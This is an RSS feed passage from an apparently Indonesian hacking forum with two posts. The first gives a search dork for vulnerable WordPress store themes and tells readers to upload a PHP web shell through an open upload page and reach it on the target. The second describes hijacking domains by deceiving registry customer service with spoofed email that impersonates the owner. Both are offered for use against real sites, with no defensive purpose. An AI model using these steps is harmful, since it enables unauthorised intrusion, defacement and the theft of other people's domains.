<a href="http://www.gantengers.web.id/2014/10/tutorial-deface-website-dengan-metode.html" target="_blank" class="mycode_url">SUMUR</a>]]></description>
			<content:encoded><![CDATA[xixixhi malam Gengs, ciee malam minggu yak ? awkawkaw kok gak ngapel x_O? malah sibuknyari exploit dimari awkwka.<br />
*nyari Bug mulu, nyari pacarnya kapan* xD<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span>.<br />
<br />
yg dh master minggir dlu beb :heart: <br />
<br />
Play with Me , Baby :P <br />
<br />
Dork :<br />
inurl:/wp-content/themes/<span style="color: #ff3366;" class="mycode_color">WPstore/</span><br />
<br />
WPStore<br />
eShop<br />
KidzStore<br />
Emporium<br />
Store<br />
eCommerce<br />
framework<br />
frameworkold<br />
Theme bisa diganti *ganti pada bagian belakangnya itu lho*<br />
<br />
Exploit: /wp-content/themes/<span style="color: #ff3366;" class="mycode_color">WPStore/</span>upload/<br />
<br />
<br />
Ciri2 Vuln x_O ?<br />
Muncul tempat Uploader Omz<br />
<br />
<img src="http://i.imgur.com/pIv5zjH.png" alt="[Image: pIv5zjH.png]" class="mycode_img" /><br />
<br />
<br />
langsung ae Upload Shell Lo Gengs..<br />
<br />
Shell Akses: target.co.li/wp-content/uploads/products_img/namashell.php<br />
<br />
<img src="http://i.imgur.com/3sgz1d0.png" alt="[Image: 3sgz1d0.png]" class="mycode_img" /><br />
<br />
Done x_O<br />
<br />
<br />
Baca juga thread gue sebelumnya gengs: <a href="http://www.backboxindonesia.or.id/thread-26.html" target="_blank" class="mycode_url">http://www.backboxindonesia.or.id/thread-26.html</a><br />
Kunjungin Blog saya plis  :D : <a href="http://tkjcyberart.blogspot.co.id/2016/03/deface-dengan-exploit-wp-store-upload.html" target="_blank" class="mycode_url"><span style="color: #33ffff;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
<br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
</span><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna mau Ngapel dolo </span> <span style="color: #aaaaaa;" class="mycode_color">:cool:</span> </span><br />
Bye<br />
<br />
<br />
<br />
<a href="http://www.gantengers.web.id/2014/10/tutorial-deface-website-dengan-metode.html" target="_blank" class="mycode_url">SUMUR</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Social Engineering ( use a fake Mail )]]></title>
			<link>https://www.backboxindonesia.or.id/thread-49.html</link>
			<pubDate>Sat, 12 Mar 2016 04:39:33 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-49.html</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Assalamualaikum</span></span><br />
<br />
<br />
halo ketemu lagi dengan saya kcnewbie hehe...<br />
kali ini saya akan menunjukan cara bagaimana Social Engineering pada CS beberapa Domain Registry..<br />
hehe... biasanya takhnik ini digunakan untuk para pentester yang sudah nyerah atau tdak tau lagi mau pake exploit apa yang bisa nembus ini site.. hehhe..<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">dulu ane pengen banget dapet ini method .. ane tanya tanya ke mastah mastah.. gk ada yang jawab..</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">trus ada yang beralibi "saya gak pandai bohong" padahal udah soceng lebih dari 1 domain.. :3</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">tapi tolong para mastah.. jangan pelit ilmu kepada newbie seperti saya :3</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">tapi saya tak putus asa.. saya cari terus.. eh .. ternyata udah di posting oleh salah satu admin LinuxSec.. yaitu</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">Yuyud Cllalue Kechhe Cyank mamah Papah...<br />
saya berterimakasih banget ama dia :3 karna post dia saya jadi bisa tau itu method...</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">pas saya coba.. method yang dia tulis di blognya.. eh :3 malah gk bisa.. pada pinter pinter.. :3</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">ok deh .. karna ini mengandalkan otak.. :3 </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">jadi ane improve aja deh.. ane cari aja celah omongan si CS :3 berikut cara dan gambar historynya..<br />
<br />
tapi sebelumnya siapkan hosting / whm / cpanel untuk ngebinding domainya ke dns cpanel ente..<br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/Bx1gOm3.png" alt="[Image: Bx1gOm3.png]" class="mycode_img" /><br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/4DrXNom.png" alt="[Image: 4DrXNom.png]" class="mycode_img" /></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/rod4zME.png" alt="[Image: rod4zME.png]" class="mycode_img" /></span></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/SlxflzX.png" alt="[Image: SlxflzX.png]" class="mycode_img" /></span></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/xG81DjC.png" alt="[Image: xG81DjC.png]" class="mycode_img" /></span></span></span><br />
<br />
gunakan <a href="https://emkei.cz/" target="_blank" class="mycode_url">https://emkei.cz/</a> untuk send fake email ....<br />
rubah email jadi email pemilik domain..  send permintaan ke pihak domain registry...<br />
<br />
tiap gambar di baca dari bawah.. :3 <br />
thanks]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Assalamualaikum</span></span><br />
<br />
<br />
halo ketemu lagi dengan saya kcnewbie hehe...<br />
kali ini saya akan menunjukan cara bagaimana Social Engineering pada CS beberapa Domain Registry..<br />
hehe... biasanya takhnik ini digunakan untuk para pentester yang sudah nyerah atau tdak tau lagi mau pake exploit apa yang bisa nembus ini site.. hehhe..<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">dulu ane pengen banget dapet ini method .. ane tanya tanya ke mastah mastah.. gk ada yang jawab..</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">trus ada yang beralibi "saya gak pandai bohong" padahal udah soceng lebih dari 1 domain.. :3</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">tapi tolong para mastah.. jangan pelit ilmu kepada newbie seperti saya :3</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">tapi saya tak putus asa.. saya cari terus.. eh .. ternyata udah di posting oleh salah satu admin LinuxSec.. yaitu</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">Yuyud Cllalue Kechhe Cyank mamah Papah...<br />
saya berterimakasih banget ama dia :3 karna post dia saya jadi bisa tau itu method...</span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">pas saya coba.. method yang dia tulis di blognya.. eh :3 malah gk bisa.. pada pinter pinter.. :3</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">ok deh .. karna ini mengandalkan otak.. :3 </span></span><br />
<span style="font-size: medium;" class="mycode_size"><span style="font-size: small;" class="mycode_size">jadi ane improve aja deh.. ane cari aja celah omongan si CS :3 berikut cara dan gambar historynya..<br />
<br />
tapi sebelumnya siapkan hosting / whm / cpanel untuk ngebinding domainya ke dns cpanel ente..<br />
<br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/Bx1gOm3.png" alt="[Image: Bx1gOm3.png]" class="mycode_img" /><br />
<img src="http://img.prntscr.com/img?url=http://i.imgur.com/4DrXNom.png" alt="[Image: 4DrXNom.png]" class="mycode_img" /></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/rod4zME.png" alt="[Image: rod4zME.png]" class="mycode_img" /></span></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/SlxflzX.png" alt="[Image: SlxflzX.png]" class="mycode_img" /></span></span></span><br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-size: x-small;" class="mycode_size"><span style="font-size: small;" class="mycode_size"><img src="http://img.prntscr.com/img?url=http://i.imgur.com/xG81DjC.png" alt="[Image: xG81DjC.png]" class="mycode_img" /></span></span></span><br />
<br />
gunakan <a href="https://emkei.cz/" target="_blank" class="mycode_url">https://emkei.cz/</a> untuk send fake email ....<br />
rubah email jadi email pemilik domain..  send permintaan ke pihak domain registry...<br />
<br />
tiap gambar di baca dari bawah.. :3 <br />
thanks]]></content:encoded>
		</item>
	</channel>
</rss>